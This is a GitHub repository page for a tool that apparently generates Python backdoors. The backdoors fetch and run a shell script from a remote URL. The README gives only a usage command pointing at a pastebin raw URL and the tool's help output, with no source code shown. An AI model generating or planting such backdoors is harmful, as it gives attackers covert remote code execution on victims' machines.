Skip to content

Generate a python-based backdoor that execute shell script on internet

License

Notifications You must be signed in to change notification settings

adamyordan/remote-gist-backdoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

How to use

$ ./generate.py https://pastebin.com/raw/abcdef -o backdoor_file

Help

$ ./generate.py -h
usage: generate.py [-h] [-o O] script_url

Generate a python-based backdoor that execute shell script in internet

positional arguments:
  script_url  Remote script file url

optional arguments:
  -h, --help  show this help message and exit
  -o O        Output file

About

Generate a python-based backdoor that execute shell script on internet

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages